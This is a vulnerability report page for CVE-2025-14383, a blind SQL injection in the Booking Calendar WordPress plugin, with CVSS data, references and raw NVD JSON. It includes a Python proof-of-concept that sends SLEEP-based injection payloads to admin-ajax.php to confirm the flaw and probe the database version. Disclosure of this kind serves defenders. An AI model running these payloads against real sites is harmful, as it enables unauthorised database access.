Security Vulnerability Report
CVE-2025-14383 CVSS 7.5 HIGH

Published: 2025-12-15 15:15:49
Last Modified: 2026-04-15 00:35:42

Description

The Booking Calendar plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'dates_to_check' parameter in all versions up to, and including, 10.14.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available for this entry (NVD status: Deferred).

Affected product, per the description: Booking Calendar WordPress plugin, all versions up to and including 10.14.8.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14383 Time-based Blind SQL Injection PoC
# Affected: Booking Calendar WordPress Plugin <= 10.14.8
# Vector: 'dates_to_check' parameter
#
# Both payloads assume the parameter lands inside a single-quoted string in
# the plugin's query; 'booking_capacity_check' is a guessed action name, not
# one confirmed by the advisory.

import requests
import sys
import time

# Target may be given on the command line; the default is a placeholder.
TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target-wordpress-site/wp-admin/admin-ajax.php"


def test_sqli_vulnerability():
    """Test if the target is vulnerable to CVE-2025-14383."""
    # Basic test payload - if vulnerable, the response is delayed by ~5 seconds
    payload = "1' AND (SELECT SLEEP(5)) AND '1'='1"
    data = {
        'action': 'booking_capacity_check',  # Likely action name (unverified)
        'dates_to_check': payload,
    }
    print(f"[*] Testing CVE-2025-14383 on {TARGET_URL}")
    print(f"[*] Payload: {payload}")
    start_time = time.time()
    try:
        requests.post(TARGET_URL, data=data, timeout=30)
        elapsed = time.time() - start_time
        if elapsed >= 4.5:  # delayed by ~5 seconds: likely vulnerable
            print(f"[+] VULNERABLE! Response delayed by {elapsed:.2f} seconds")
            return True
        print("[-] Not vulnerable or target not found")
        return False
    except requests.exceptions.Timeout:
        # A 5-second SLEEP cannot exceed the 30-second timeout, so a timeout
        # is a network or server problem, not evidence of injection.
        print("[?] Request timed out (inconclusive)")
        return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


def extract_data_via_blind_sqli():
    """Check the first character of the database version via a timed condition."""
    # Sleeps only when the first character of @@version is '5'
    payload = ("1' AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='5') "
               "THEN SLEEP(5) ELSE 0 END) AND '1'='1")
    data = {
        'action': 'booking_capacity_check',
        'dates_to_check': payload,
    }
    start_time = time.time()
    requests.post(TARGET_URL, data=data, timeout=30)
    elapsed = time.time() - start_time
    if elapsed >= 4.5:
        print("[+] MySQL Version starts with '5'")
    else:
        print("[-] MySQL Version does not start with '5'")


if __name__ == "__main__":
    if test_sqli_vulnerability():
        extract_data_via_blind_sqli()

References

https://plugins.trac.wordpress.org/changeset/3416518/booking/trunk/includes/_capacity/capacity.php (WordPress.org plugin repository changeset for includes/_capacity/capacity.php)
https://www.wordfence.com/threat-intel/vulnerabilities/id/790f93b0-eb69-473f-a726-bfe215f5d870?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14383",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T15:15:49.347",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Booking Calendar plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'dates_to_check' parameter in all versions up to, and including, 10.14.8 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-89"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3416518/booking/trunk/includes/_capacity/capacity.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/790f93b0-eb69-473f-a726-bfe215f5d870?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}